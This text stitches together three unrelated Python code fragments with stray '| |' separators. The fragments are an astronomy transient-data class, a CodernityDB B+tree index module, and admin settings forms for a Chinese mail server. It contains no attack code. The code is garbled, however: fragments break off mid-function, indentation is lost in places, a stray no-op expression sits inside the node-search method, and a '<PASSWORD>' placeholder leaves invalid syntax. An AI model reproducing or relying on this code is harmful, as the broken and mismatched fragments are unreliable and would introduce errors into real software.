flux_density = np.array(df["flux_density(mjy)"])
flux_density_err = np.array(df["flux_density_error"])
if data_mode == "magnitude":
return time_days, time_mjd, magnitude, magnitude_err, bands
elif data_mode == "flux_density":
return time_days, time_mjd, flux_density, flux_density_err, bands
elif data_mode == "all":
return time_days, time_mjd, flux_density, flux_density_err, magnitude, magnitude_err, bands
@classmethod
def from_lasair_data(
cls, name: str, data_mode: str = "magnitude", active_bands: Union[np.ndarray, str] = 'all',
use_phase_model: bool = False) -> Transient:
"""Constructor method to built object from Open Access Catalogue.
:param name: Name of the transient.
:type name: str
:param data_mode: Data mode used. Must be from `OpticalTransient.DATA_MODES`. Default is magnitude.
:type data_mode: str, optional
:param active_bands: Sets active bands based on array given.
If argument is 'all', all unique bands in `self.bands` will be used.
:type active_bands: Union[np.ndarray, str]
:param use_phase_model: Whether to use a phase model.
:type use_phase_model: bool, optional
:return: A class instance.
:rtype: OpticalTransient
"""
if cls.__name__ == "TDE":
transient_type = "tidal_disruption_event"
else:
transient_type = cls.__name__.lower()
directory_structure = redback.get_data.directory.lasair_directory_structure(
transient=name, transient_type=transient_type)
df = pd.read_csv(directory_structure.processed_file_path)
time_days = np.array(df["time (days)"])
time_mjd = np.array(df["time"])
magnitude = np.array(df["magnitude"])
magnitude_err = np.array(df["e_magnitude"])
bands = np.array(df["band"])
flux_density = np.array(df["flux_density(mjy)"])
flux_density_err = np.array(df["flux_density_error"])
return cls(name=name, data_mode=data_mode, time=time_days, time_err=None, time_mjd=time_mjd,
flux_density=flux_density, flux_density_err=flux_density_err, magnitude=magnitude,
magnitude_err=magnitude_err, bands=bands, active_bands=active_bands,
use_phase_model=use_phase_model)
@property
def _time_attribute_name(self) -> str:
if self.luminosity_data:
return "time_rest_frame"
elif self.use_phase_model:
return "time_mjd"
return "time"
@property
def _time_err_attribute_name(self) -> str:
return self._time_attribute_name + "_err"
@property
def _y_attribute_name(self) -> str:
return self._ATTRIBUTE_NAME_DICT[self.data_mode]
@property
def _y_err_attribute_name(self) -> str:
return self._ATTRIBUTE_NAME_DICT[self.data_mode] + "_err"
@property
def x(self) -> np.ndarray:
"""
:return: The time values given the active data mode.
:rtype: np.ndarray
"""
return getattr(self, self._time_attribute_name)
@x.setter
def x(self, x: np.ndarray) -> None:
"""Sets the time values for the active data mode.
:param x: The desired time values.
:type x: np.ndarray
"""
setattr(self, self._time_attribute_name, x)
@property
def x_err(self) -> np.ndarray:
"""
:return: The time error values given the active data mode.
:rtype: np.ndarray
"""
return getattr(self, self._time_err_attribute_name)
@x_err.setter
def x_err(self, x_err: np.ndarray) -> None:
"""Sets the time error values for the active data mode.
:param x_err: The desired time error values.
:type x_err: np.ndarray
"""
setattr(self, self._time_err_attribute_name, x_err)
@property
def y(self) -> np.ndarray:
"""
:return: The y values given the active data mode.
:rtype: np.ndarray
"""
return getattr(self, self._y_attribute_name)
@y.setter
def y(self, y: np.ndarray) -> None:
"""Sets the y values for the active data mode.
:param y: The desired y values.
:type y: np.ndarray
"""
setattr(self, self._y_attribute_name, y)
@property
def y_err(self) -> np.ndarray:
"""
:return: The y error values given the active data mode.
:rtype: np.ndarray
"""
return getattr(self, self._y_err_attribute_name)
@y_err.setter
def y_err(self, y_err: np.ndarray) -> None:
"""Sets the y error values for the active data mode.
:param y_err: The desired y error values.
:type y_err: np.ndarray
"""
setattr(self, self._y_err_attribute_name, y_err)
@property
def data_mode(self) -> str:
"""
:return: The currently active data mode (one in `Transient.DATA_MODES`).
:rtype: str
"""
return self._data_mode
@data_mode.setter
def data_mode(self, data_mode: str) -> None:
"""
:param data_mode: One of the data modes in `Transient.DATA_MODES`.
:type data_mode: str
"""
if data_mode in self.DATA_MODES or data_mode is None:
self._data_mode = data_mode
else:
raise ValueError("Unknown data mode.")
@property
def xlabel(self) -> str:
"""
:return: xlabel used in plotting functions
:rtype: | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011-2013 Codernity (http://codernity.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from index import Index, IndexException, DocIdNotFound, ElemNotFound
import struct
import marshal
import os
import io
import shutil
from storage import IU_Storage
# from ipdb import set_trace
from CodernityDB.env import cdb_environment
from CodernityDB.index import TryReindexException
if cdb_environment.get('rlock_obj'):
from CodernityDB import patch
patch.patch_cache_rr(cdb_environment['rlock_obj'])
from CodernityDB.rr_cache import cache1lvl, cache2lvl
# Size of the sliding read window used when scanning leaves/nodes.
tree_buffer_size = io.DEFAULT_BUFFER_SIZE
cdb_environment['tree_buffer_size'] = tree_buffer_size
# Binary-search modes: locate the first or the last occurrence of a key.
MODE_FIRST = 0
MODE_LAST = 1
# Directions for shifting the read-buffer window during a search.
MOVE_BUFFER_PREV = 0
MOVE_BUFFER_NEXT = 1
class NodeCapacityException(IndexException):
    """Raised when a tree index is created with node_capacity < 3."""
    pass
class IU_TreeBasedIndex(Index):
custom_header = 'from CodernityDB.tree_index import TreeBasedIndex'
    def __init__(self, db_path, name, key_format='32s', pointer_format='I',
                 meta_format='32sIIc', node_capacity=10, storage_class=None):
        """B+tree-style index persisted in a '<name>_buck' bucket file.

        :param db_path: directory holding the index files
        :param name: index name, used as the bucket file prefix
        :param key_format: struct format of a single key
        :param pointer_format: struct format of a file pointer
        :param meta_format: struct format of a leaf record's metadata
        :param node_capacity: maximum keys per node/leaf; must be >= 3
        :param storage_class: storage implementation (class or class name);
            defaults to IU_Storage
        """
        if node_capacity < 3:
            raise NodeCapacityException
        super(IU_TreeBasedIndex, self).__init__(db_path, name)
        # Tree data begins right after the one-byte root flag.
        self.data_start = self._start_ind + 1
        self.node_capacity = node_capacity
        self.flag_format = 'c'
        self.elements_counter_format = 'h'
        self.pointer_format = pointer_format
        self.key_format = key_format
        self.meta_format = meta_format
        # Derive all composite struct formats and byte sizes from the above.
        self._count_props()
        if not storage_class:
            storage_class = IU_Storage
        # Persist only the class *name*; the class is resolved when opening.
        if storage_class and not isinstance(storage_class, basestring):
            storage_class = storage_class.__name__
        self.storage_class = storage_class
        self.storage = None
        # Wrap the hot read paths in one- and two-level LRU-style caches.
        # NOTE: wrapping happens per instance, so the caches are not shared.
        cache = cache1lvl(100)
        twolvl_cache = cache2lvl(150)
        self._find_key = cache(self._find_key)
        self._match_doc_id = cache(self._match_doc_id)
        # self._read_single_leaf_record =
        # twolvl_cache(self._read_single_leaf_record)
        self._find_key_in_leaf = twolvl_cache(self._find_key_in_leaf)
        self._read_single_node_key = twolvl_cache(self._read_single_node_key)
        self._find_first_key_occurence_in_node = twolvl_cache(
            self._find_first_key_occurence_in_node)
        self._find_last_key_occurence_in_node = twolvl_cache(
            self._find_last_key_occurence_in_node)
        self._read_leaf_nr_of_elements = cache(self._read_leaf_nr_of_elements)
        self._read_leaf_neighbours = cache(self._read_leaf_neighbours)
        self._read_leaf_nr_of_elements_and_neighbours = cache(
            self._read_leaf_nr_of_elements_and_neighbours)
        self._read_node_nr_of_elements_and_children_flag = cache(
            self._read_node_nr_of_elements_and_children_flag)
def _count_props(self):
"""
Counts dynamic properties for tree, such as all complex formats
"""
self.single_leaf_record_format = self.key_format + self.meta_format
self.single_node_record_format = self.pointer_format + \
self.key_format + self.pointer_format
self.node_format = self.elements_counter_format + self.flag_format\
+ self.pointer_format + (self.key_format +
self.pointer_format) * self.node_capacity
self.leaf_format = self.elements_counter_format + self.pointer_format * 2\
+ (self.single_leaf_record_format) * self.node_capacity
self.leaf_heading_format = self.elements_counter_format + \
self.pointer_format * 2
self.node_heading_format = self.elements_counter_format + \
self.flag_format
self.key_size = struct.calcsize('<' + self.key_format)
self.meta_size = struct.calcsize('<' + self.meta_format)
self.single_leaf_record_size = struct.calcsize('<' + self.
single_leaf_record_format)
self.single_node_record_size = struct.calcsize('<' + self.
single_node_record_format)
self.node_size = struct.calcsize('<' + self.node_format)
self.leaf_size = struct.calcsize('<' + self.leaf_format)
self.flag_size = struct.calcsize('<' + self.flag_format)
self.elements_counter_size = struct.calcsize('<' + self.
elements_counter_format)
self.pointer_size = struct.calcsize('<' + self.pointer_format)
self.leaf_heading_size = struct.calcsize(
'<' + self.leaf_heading_format)
self.node_heading_size = struct.calcsize(
'<' + self.node_heading_format)
    def create_index(self):
        """Create the bucket file, write index metadata and an empty root leaf.

        :raises IndexException: if the bucket file already exists
        """
        if os.path.isfile(os.path.join(self.db_path, self.name + '_buck')):
            raise IndexException('Already exists')
        with io.open(os.path.join(self.db_path, self.name + "_buck"), 'w+b') as f:
            # Marshal the index parameters into the file header so the index
            # can be re-opened later with the same configuration.
            props = dict(name=self.name,
                         flag_format=self.flag_format,
                         pointer_format=self.pointer_format,
                         elements_counter_format=self.elements_counter_format,
                         node_capacity=self.node_capacity,
                         key_format=self.key_format,
                         meta_format=self.meta_format,
                         version=self.__version__,
                         storage_class=self.storage_class)
            f.write(marshal.dumps(props))
        # Re-open unbuffered for random-access reads/writes.
        self.buckets = io.open(os.path.join(self.db_path, self.name +
                                            "_buck"), 'r+b', buffering=0)
        self._create_storage()
        self.buckets.seek(self._start_ind)
        # Root flag 'l': the root is (still) a leaf.
        self.buckets.write(struct.pack('<c', 'l'))
        self._insert_empty_root()
        self.root_flag = 'l'
    def destroy(self):
        """Remove the index files and drop all cached reads."""
        super(IU_TreeBasedIndex, self).destroy()
        self._clear_cache()
    def open_index(self):
        """Open an existing bucket file and restore the root flag.

        :raises IndexException: if the bucket file does not exist
        """
        if not os.path.isfile(os.path.join(self.db_path, self.name + '_buck')):
            raise IndexException("Doesn't exists")
        self.buckets = io.open(
            os.path.join(self.db_path, self.name + "_buck"), 'r+b', buffering=0)
        self.buckets.seek(self._start_ind)
        # One byte: 'l' when the root is a leaf, otherwise an inner node.
        self.root_flag = struct.unpack('<c', self.buckets.read(1))[0]
        self._fix_params()
        self._open_storage()
    def _insert_empty_root(self):
        """Write an empty root leaf (0 elements, no neighbours) at data_start."""
        self.buckets.seek(self.data_start)
        # Leaf heading: element counter, prev-leaf and next-leaf pointers.
        root = struct.pack('<' + self.leaf_heading_format,
                           0,
                           0,
                           0)
        # Zero-fill the record area for node_capacity leaf records.
        root += self.single_leaf_record_size * self.node_capacity * '\x00'
        self.buckets.write(root)
        self.flush()
    def insert(self, doc_id, key, start, size, status='o'):
        """Insert a (key -> doc_id, start, size, status) record into the tree.

        First descends to the target leaf, then inserts the record there,
        splitting upwards through the recorded nodes_stack/indexes if needed.
        """
        nodes_stack, indexes = self._find_leaf_to_insert(key)
        self._insert_new_record_into_leaf(nodes_stack.pop(),
                                          key,
                                          doc_id,
                                          start,
                                          size,
                                          status,
                                          nodes_stack,
                                          indexes)
        # Drop any stale cached lookup result for this doc_id.
        self._match_doc_id.delete(doc_id)
    def _read_leaf_nr_of_elements_and_neighbours(self, leaf_start):
        """Return (nr_of_elements, prev_leaf_start, next_leaf_start) of a leaf."""
        self.buckets.seek(leaf_start)
        data = self.buckets.read(
            self.elements_counter_size + 2 * self.pointer_size)
        nr_of_elements, prev_l, next_l = struct.unpack(
            '<' + self.elements_counter_format + 2 * self.pointer_format,
            data)
        return nr_of_elements, prev_l, next_l
    def _read_node_nr_of_elements_and_children_flag(self, start):
        """Return (nr_of_elements, children_flag) of the inner node at *start*."""
        self.buckets.seek(start)
        data = self.buckets.read(self.elements_counter_size + self.flag_size)
        nr_of_elements, children_flag = struct.unpack(
            '<' + self.elements_counter_format + self.flag_format,
            data)
        return nr_of_elements, children_flag
    def _read_leaf_nr_of_elements(self, start):
        """Return the number of elements stored in the leaf at *start*."""
        self.buckets.seek(start)
        data = self.buckets.read(self.elements_counter_size)
        nr_of_elements = struct.unpack(
            '<' + self.elements_counter_format, data)
        return nr_of_elements[0]
    def _read_single_node_key(self, node_start, key_index):
        """Return (left_pointer, key, right_pointer) of key *key_index* in a node."""
        self.buckets.seek(self._calculate_key_position(
            node_start, key_index, 'n'))
        data = self.buckets.read(self.single_node_record_size)
        flag_left, key, pointer_right = struct.unpack(
            '<' + self.single_node_record_format, data)
        return flag_left, key, pointer_right
    def _read_single_leaf_record(self, leaf_start, key_index):
        """Return (key, doc_id, start, size, status) of record *key_index* in a leaf."""
        self.buckets.seek(self._calculate_key_position(
            leaf_start, key_index, 'l'))
        data = self.buckets.read(self.single_leaf_record_size)
        key, doc_id, start, size, status = struct.unpack('<' + self.
                                                         single_leaf_record_format, data)
        return key, doc_id, start, size, status
def _calculate_key_position(self, start, key_index, flag):
"""
Calculates position of key in buckets file
"""
if flag == 'l':
return start + self.leaf_heading_size + key_index * self.single_leaf_record_size
elif flag == 'n':
# returns start position of flag before key[key_index]
return start + self.node_heading_size + key_index * (self.pointer_size + self.key_size)
    def _match_doc_id(self, doc_id, key, element_index, leaf_start, nr_of_elements):
        """Scan forward from element_index+1 for the record of (key, doc_id).

        Follows the leaf linked list while the key run continues.
        :return: (leaf_start, nr_of_elements, key_index) of the match
        :raises DocIdNotFound: if the key run or the leaf chain ends without
            a matching, non-deleted doc_id
        """
        curr_key_index = element_index + 1
        curr_leaf_start = leaf_start
        next_leaf = self._read_leaf_neighbours(leaf_start)[1]
        while True:
            if curr_key_index < nr_of_elements:
                curr_key, curr_doc_id, curr_start, curr_size,\
                    curr_status = self._read_single_leaf_record(
                        curr_leaf_start, curr_key_index)
                if key != curr_key:
                    # shouldn't happen, crashes earlier on id index
                    raise DocIdNotFound
                elif doc_id == curr_doc_id and curr_status != 'd':
                    return curr_leaf_start, nr_of_elements, curr_key_index
                else:
                    # Deleted record or different doc_id: keep scanning.
                    curr_key_index = curr_key_index + 1
            else:  # there are no more elements in current leaf, must jump to next
                if not next_leaf:  # end of leaf linked list
                    # shouldn't happen, crashes earlier on id index
                    raise DocIdNotFound
                else:
                    curr_leaf_start = next_leaf
                    nr_of_elements, prev_leaf, next_leaf = self._read_leaf_nr_of_elements_and_neighbours(next_leaf)
                    curr_key_index = 0
    def _find_existing(self, key, element_index, leaf_start, nr_of_elements):
        """Scan forward from element_index+1 for the next non-deleted *key* record.

        Follows the leaf linked list while the key run continues.
        :return: (leaf_start, nr_of_elements, key_index) of the match
        :raises ElemNotFound: if the key run or the leaf chain ends first
        """
        curr_key_index = element_index + 1
        curr_leaf_start = leaf_start
        next_leaf = self._read_leaf_neighbours(leaf_start)[1]
        while True:
            if curr_key_index < nr_of_elements:
                curr_key, curr_doc_id, curr_start, curr_size,\
                    curr_status = self._read_single_leaf_record(
                        curr_leaf_start, curr_key_index)
                if key != curr_key:
                    raise ElemNotFound
                elif curr_status != 'd':
                    return curr_leaf_start, nr_of_elements, curr_key_index
                else:
                    # Deleted record: keep scanning.
                    curr_key_index = curr_key_index + 1
            else:  # there are no more elements in current leaf, must jump to next
                if not next_leaf:  # end of leaf linked list
                    raise ElemNotFound
                else:
                    curr_leaf_start = next_leaf
                    nr_of_elements, prev_leaf, next_leaf = self._read_leaf_nr_of_elements_and_neighbours(next_leaf)
                    curr_key_index = 0
    def _update_element(self, leaf_start, key_index, new_data):
        """Overwrite the metadata (doc_id, start, size, status) of a leaf record."""
        # Skip past the key; only the meta part is rewritten.
        self.buckets.seek(self._calculate_key_position(leaf_start, key_index, 'l')
                          + self.key_size)
        self.buckets.write(struct.pack('<' + self.meta_format,
                                       *new_data))
        # self._read_single_leaf_record.delete(leaf_start_position, key_index)
    def _delete_element(self, leaf_start, key_index):
        """Soft-delete a leaf record by writing 'd' into its trailing status byte."""
        self.buckets.seek(self._calculate_key_position(leaf_start, key_index, 'l')
                          + self.single_leaf_record_size - 1)
        self.buckets.write(struct.pack('<c', 'd'))
        # self._read_single_leaf_record.delete(leaf_start_position, key_index)
    def _leaf_linear_key_search(self, key, start, start_index, end_index):
        """Linearly scan leaf records [start_index..end_index] for *key*.

        *start* is the absolute file offset of record *start_index*.
        Assumes the key is present in the scanned range (no bounds check).
        :return: index of the first record whose key equals *key*
        """
        self.buckets.seek(start)
        data = self.buckets.read(
            (end_index - start_index + 1) * self.single_leaf_record_size)
        curr_key = struct.unpack(
            '<' + self.key_format, data[:self.key_size])[0]
        data = data[self.single_leaf_record_size:]
        curr_index = 0
        while curr_key != key:
            curr_index += 1
            curr_key = struct.unpack(
                '<' + self.key_format, data[:self.key_size])[0]
            data = data[self.single_leaf_record_size:]
        return start_index + curr_index
    def _node_linear_key_search(self, key, start, start_index, end_index):
        """Linearly scan node keys [start_index..end_index] for *key*.

        Skips the child pointer that precedes each key.
        Assumes the key is present in the scanned range (no bounds check).
        :return: index of the first key equal to *key*
        """
        self.buckets.seek(start + self.pointer_size)
        data = self.buckets.read((end_index - start_index + 1) * (
            self.key_size + self.pointer_size))
        curr_key = struct.unpack(
            '<' + self.key_format, data[:self.key_size])[0]
        data = data[self.key_size + self.pointer_size:]
        curr_index = 0
        while curr_key != key:
            curr_index += 1
            curr_key = struct.unpack(
                '<' + self.key_format, data[:self.key_size])[0]
            data = data[self.key_size + self.pointer_size:]
        return start_index + curr_index
def _next_buffer(self, buffer_start, buffer_end):
return buffer_end, buffer_end + tree_buffer_size
def _prev_buffer(self, buffer_start, buffer_end):
return buffer_start - tree_buffer_size, buffer_start
    def _choose_next_candidate_index_in_leaf(self, leaf_start, candidate_start, buffer_start, buffer_end, imin, imax):
        """Pick the midpoint of [imin, imax] as the next binary-search probe in a leaf.

        Also reports whether the read window must move so the probed record is
        fully inside the buffer (MOVE_BUFFER_PREV / MOVE_BUFFER_NEXT / None).
        :return: (candidate file offset, candidate index, move_buffer)
        """
        if buffer_start > candidate_start:
            move_buffer = MOVE_BUFFER_PREV
        elif buffer_end < candidate_start + self.single_leaf_record_size:
            move_buffer = MOVE_BUFFER_NEXT
        else:
            move_buffer = None
        # NOTE: Python 2 integer division -> floor midpoint.
        return self._calculate_key_position(leaf_start, (imin + imax) / 2, 'l'), (imin + imax) / 2, move_buffer
def _choose_next_candidate_index_in_node(self, node_start, candidate_start, buffer_start, buffer_end, imin, imax):
if buffer_start > candidate_start:
move_buffer = MOVE_BUFFER_PREV
elif buffer_end < candidate_start + self.single_node_record_size:
(self.pointer_size + self.key_size) - 1
move_buffer = MOVE_BUFFER_NEXT
else:
move_buffer = None
return self._calculate_key_position(node_start, (imin + imax) / 2, 'n'), (imin + imax) / 2, move_buffer
    def _find_key_in_leaf(self, leaf_start, key, nr_of_elements):
        """Find the first non-deleted record with *key*; return its data fields.

        :return: (doc_id, key, start, size, status) — the last 5 elements of
            the underlying search result (positions are stripped)
        """
        if nr_of_elements == 1:
            return self._find_key_in_leaf_with_one_element(key, leaf_start)[-5:]
        else:
            return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements)[-5:]
    def _find_key_in_leaf_for_update(self, key, doc_id, leaf_start, nr_of_elements):
        """Find the record matching both *key* and *doc_id*, with its position."""
        if nr_of_elements == 1:
            return self._find_key_in_leaf_with_one_element(key, leaf_start, doc_id=doc_id)
        else:
            return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements, mode=MODE_FIRST, doc_id=doc_id)
    def _find_index_of_first_key_equal_or_smaller_key(self, key, leaf_start, nr_of_elements):
        """Return (leaf_start, index) of the first occurrence, or the closest match."""
        if nr_of_elements == 1:
            return self._find_key_in_leaf_with_one_element(key, leaf_start, mode=MODE_FIRST, return_closest=True)[:2]
        else:
            return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements, mode=MODE_FIRST, return_closest=True)[:2]
    def _find_index_of_last_key_equal_or_smaller_key(self, key, leaf_start, nr_of_elements):
        """Return (leaf_start, index) of the last occurrence, or the closest match."""
        if nr_of_elements == 1:
            return self._find_key_in_leaf_with_one_element(key, leaf_start, mode=MODE_LAST, return_closest=True)[:2]
        else:
            return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements, mode=MODE_LAST, return_closest=True)[:2]
    def _find_index_of_first_key_equal(self, key, leaf_start, nr_of_elements):
        """Return (leaf_start, index) of the first exact occurrence of *key*."""
        if nr_of_elements == 1:
            return self._find_key_in_leaf_with_one_element(key, leaf_start, mode=MODE_FIRST)[:2]
        else:
            return self._find_key_in_leaf_using_binary_search(key, leaf_start, nr_of_elements, mode=MODE_FIRST)[:2]
    def _find_key_in_leaf_with_one_element(self, key, leaf_start, doc_id=None, mode=None, return_closest=False):
        """Handle the single-record leaf case of all key searches.

        :return: (leaf_start, 0) when only the closest position is wanted and
            the key does not match; otherwise the full
            (leaf_start, 0, doc_id, key, start, size, status) tuple
        :raises ElemNotFound: key missing, or the record is deleted
        :raises DocIdNotFound: key matches but doc_id differs
        """
        curr_key, curr_doc_id, curr_start, curr_size,\
            curr_status = self._read_single_leaf_record(leaf_start, 0)
        if key != curr_key:
            if return_closest and curr_status != 'd':
                return leaf_start, 0
            else:
                raise ElemNotFound
        else:
            if curr_status == 'd':
                raise ElemNotFound
            elif doc_id is not None and doc_id != curr_doc_id:
                # shouldn't happen, crashes earlier on id index
                raise DocIdNotFound
            else:
                return leaf_start, 0, curr_doc_id, curr_key, curr_start, curr_size, curr_status
def _find_key_in_leaf_using_binary_search(self, key, leaf_start, nr_of_elements, doc_id=None, mode=None, return_closest=False):
"""
Binary search implementation used | |
    def save(self):
        """Persist the form parameters and sync the strong-password switches."""
        self.paramSave()
        # Compatibility with the legacy PHP-side strong-password rule switch:
        # turn the PHP-side switch off...
        DomainAttr.saveAttrObjValue(
            domain_id=self.domain_id.value,
            type=u"webmail",
            item="sw_pass_severe",
            value="-1"
        )
        # ...and use the superadmin-side switch instead.
        DomainAttr.saveAttrObjValue(
            domain_id=self.domain_id.value,
            type=u"webmail",
            item="sw_pass_severe_new",
            value="1"
        )
#第三方对接
class DomainSysInterfaceForm(DomainForm):
    """Third-party system-interface settings form."""
    PARAM_NAME = dict(constants.DOMAIN_SYS_INTERFACE_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_SYS_INTERFACE_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_SYS_INTERFACE_TYPE)
    def initPostParams(self):
        # Switches absent from the POST default to disabled.
        self.initPostParamsDefaultDisable()
class DomainSysInterfaceAuthApiForm(DomainForm):
    """Third-party authentication API settings form."""
    PARAM_NAME = dict(constants.DOMAIN_SYS_INTERFACE_AUTH_API_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_SYS_INTERFACE_AUTH_API_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_SYS_INTERFACE_AUTH_API_TYPE)
class DomainSysInterfaceIMApiForm(DomainForm):
    """Third-party instant-messaging API settings form."""
    PARAM_NAME = dict(constants.DOMAIN_SYS_INTERFACE_IM_API_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_SYS_INTERFACE_IM_API_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_SYS_INTERFACE_IM_API_TYPE)
#杂项设置
class DomainSysOthersForm(DomainForm):
PARAM_NAME = dict(constants.DOMAIN_SYS_OTHERS_PARAMS)
PARAM_LIST = dict(constants.DOMAIN_SYS_OTHERS_VALUE)
PARAM_TYPE = dict(constants.DOMAIN_SYS_OTHERS_TYPE)
SMSServiceList = (
(u'jiutian', _(u'短信通道一(九天)')),
(u'zhutong', _(u'短信通道二(助通)')),
)
@property
def get_sms_list(self):
return self.SMSServiceList
def initPostParams(self):
self.initPostParamsDefaultDisable()
data = self.post if self.post else self.get
#短信服务器配置
confSms = DomainAttr.objects.filter(domain_id=self.domain_id.value,type="system",item="cf_sms_conf").first()
dataSms = "{}" if not confSms else confSms.value
try:
jsonSms = json.loads(dataSms)
jsonSms = {} if not isinstance(jsonSms, dict) else jsonSms
except:
jsonSms = {}
self.sms_type = jsonSms.get(u"type", u"")
self.sms_account = jsonSms.get(u"account", u"")
self.sms_password = jsonSms.get(u"password", u"")
self.sms_sign = jsonSms.get(u"sign", u"")
if "sms_type" in data:
self.sms_type = data["sms_type"]
if "sms_account" in data:
self.sms_account = data["sms_account"]
if "sms_password" in data:
self.sms_password = data["sms_password"]
if "sms_sign" in data:
self.sms_sign = data["sms_sign"]
jsonSms["type"] = self.sms_type
jsonSms["account"] = self.sms_account
jsonSms["password"] = <PASSWORD>
jsonSms["sign"] = self.sms_sign
self.cf_sms_conf = BaseFied(value=json.dumps(jsonSms), error=None)
self.sms_cost = None
try:
if self.request.user.licence_validsms and (self.sms_account and self.sms_password):
from lib import sms_interface
self.sms_cost = sms_interface.query_sms_cost(self.sms_type, self.sms_account, self.sms_password)
except Exception,err:
print err
def save(self):
super(DomainSysOthersForm, self).save()
#旧版本的短信开关是保存在域名上的
Domain.objects.filter(id=self.domain_id.value).update(
recvsms=self.sw_recvsms.value,
sendsms=self.sw_sendsms.value,
)
class DomainSysOthersCleanForm(DomainForm):
    """Mailbox auto-clean settings plus the space-warning mail template.

    Persisted as two JSON blobs: cf_spaceclean (retention days per folder,
    "0" meaning keep forever) and cf_spacemail (warning mail subject,
    content and usage threshold percentage).
    """
    PARAM_NAME = dict(constants.DOMAIN_SYS_OTHERS_SPACE_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_SYS_OTHERS_SPACE_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_SYS_OTHERS_SPACE_TYPE)
    def initialize(self):
        self.initBasicParams()
        newData = self.post if self.post else self.get
        if "domain_id" in newData:
            self.domain_id = BaseFied(value=newData["domain_id"], error=None)
        # Decode the stored JSON blobs; fall back to empty config on error.
        try:
            oldCleanData = json.loads(self.cf_spaceclean.value)
        except:
            oldCleanData = {}
        try:
            oldMailData = json.loads(self.cf_spacemail.value)
        except:
            oldMailData = {}
        oldCleanData = {} if not isinstance(oldCleanData, dict) else oldCleanData
        oldMailData = {} if not isinstance(oldMailData, dict) else oldMailData
        # Stored values first...
        self.general_keep_time = get_unicode(oldCleanData.get(u"general_keep_time", u"0"))
        self.sent_keep_time = get_unicode(oldCleanData.get(u"sent_keep_time", u"0"))
        self.spam_keep_time = get_unicode(oldCleanData.get(u"spam_keep_time", u"0"))
        self.trash_keep_time = get_unicode(oldCleanData.get(u"trash_keep_time", u"0"))
        self.subject = oldMailData.get(u"subject", u"").strip()
        self.content = oldMailData.get(u"content", u"")
        self.warn_rate=get_unicode(oldMailData.get(u"warn_rate", u"85"))
        # ...then request data overrides everything when present.
        if newData:
            self.general_keep_time = get_unicode(newData.get(u"general_keep_time", u"0"))
            self.sent_keep_time = get_unicode(newData.get(u"sent_keep_time", u"0"))
            self.spam_keep_time = get_unicode(newData.get(u"spam_keep_time", u"0"))
            self.trash_keep_time = get_unicode(newData.get(u"trash_keep_time", u"0"))
            self.subject = newData.get(u"subject", u"").strip()
            self.content = newData.get(u"content", u"")
            self.warn_rate=get_unicode(newData.get(u"warn_rate", u"85"))
        # Re-encode for persistence.
        saveCleanData = {
            u"general_keep_time" : self.general_keep_time,
            u"sent_keep_time" : self.sent_keep_time,
            u"spam_keep_time" : self.spam_keep_time,
            u"trash_keep_time" : self.trash_keep_time,
        }
        saveMailData = {
            u"subject" : self.subject,
            u"content" : self.content,
            u"warn_rate" : self.warn_rate,
        }
        self.cf_spaceclean = BaseFied(value=json.dumps(saveCleanData), error=None)
        self.cf_spacemail = BaseFied(value=json.dumps(saveMailData), error=None)
class DomainSysOthersAttachForm(DomainForm):
    """Online-attachment (large mail transfer) settings form.

    Persisted as one JSON blob (cf_online_attach) holding the download URL,
    the transfer size thresholds and the public-visibility flag.
    """
    PARAM_NAME = dict(constants.DOMAIN_SYS_OTHERS_ATTACH_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_SYS_OTHERS_ATTACH_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_SYS_OTHERS_ATTACH_TYPE)
    def initialize(self):
        self.initBasicParams()
        newData = self.post if self.post else self.get
        if "domain_id" in newData:
            self.domain_id = BaseFied(value=newData["domain_id"], error=None)
        try:
            oldData = json.loads(self.cf_online_attach.value)
        except:
            oldData = {}
        # These settings must be initialized in the DB when empty, otherwise
        # the app side fails when reading them.
        autoSave = False
        # "size" is unused since 2.2.58: before that version it was the
        # transfer size for all mail types; transferred mails are typed now,
        # so it only serves as the default for the per-type sizes below.
        self.client_size_default = oldData.get("size", "50")
        self.client_url = oldData.get("url", "")
        self.client_public = oldData.get("public", "-1")
        self.client_size_list = oldData.get("size_list", self.client_size_default)
        self.client_size_in = oldData.get("size_in", self.client_size_default)
        self.client_size_out = oldData.get("size_out", self.client_size_default)
        # Default download URL comes from the system-wide setting.
        if not self.client_url.strip():
            obj = DomainAttr.objects.filter(domain_id=0,type=u'system',item=u'view_webmail_url').first()
            self.client_url = obj.value if obj else ""
        # If the system setting is empty too, derive it from the request.
        if not self.client_url.strip() and self.request:
            self.client_url = get_client_request(self.request)
            autoSave = True
        if newData:
            self.client_size_list = newData.get("client_size_list", self.client_size_default)
            self.client_size_in = newData.get("client_size_in", self.client_size_default)
            self.client_size_out = newData.get("client_size_out", self.client_size_default)
            self.client_url = newData.get("client_url", "")
            self.client_public = newData.get("client_public", "-1")
        saveData = {
            u"url" : self.client_url,
            u"size" : self.client_size_default,
            u"size_list" : self.client_size_list,
            u"size_in" : self.client_size_in,
            u"size_out" : self.client_size_out,
            u"public" : self.client_public,
        }
        self.cf_online_attach = BaseFied(value=json.dumps(saveData), error=None)
        if autoSave:
            self.paramSave()
class DomainSignDomainForm(DomainForm):
    """Domain-wide mail signature form.

    Persisted as one JSON blob (cf_domain_signature) with base64-encoded
    HTML, plain text, and a 'new' marker distinguishing the encoded format
    from the legacy plain-HTML one.
    """
